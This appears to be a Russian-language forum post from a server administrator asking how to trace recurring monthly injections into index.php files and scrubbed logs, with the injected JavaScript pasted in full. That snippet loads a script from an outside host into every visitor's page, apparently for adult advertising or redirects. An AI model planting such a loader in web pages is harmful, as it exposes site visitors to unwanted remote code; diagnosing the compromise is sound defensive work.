Вобщем, что то завелось на серваке, вычислить не могу.
18го числа каждого месяца в файлики index.php первой строкой прописывается зловредный код.
Пароли все менял уже неоднократно, FTP нет, с винды по SSH на сервак в качестве эксперимента уже месяц не ходил
Логи...обрываются до начала работы этой хрени (ну или, скорее, подчищаются после работы этой хрени до безобидных строчек)
Как отловить?
Отправлено спустя 30 минут 56 секунд:
Код: Выделить всё
<script type="text/javascript"> (function(w) { var s = document.createElement('script'); var z = setInterval(function() { if (document.readyState == 'interactive' || document.readyState == 'complete') { clearInterval(z); s.src = "http://92007.w4statistics.info/click.php?p=279773&adult=1&c"; s.async = true; s.type = type = 'text/javascript'; w.document.body.appendChild(s); } }, 200); })(window); </script>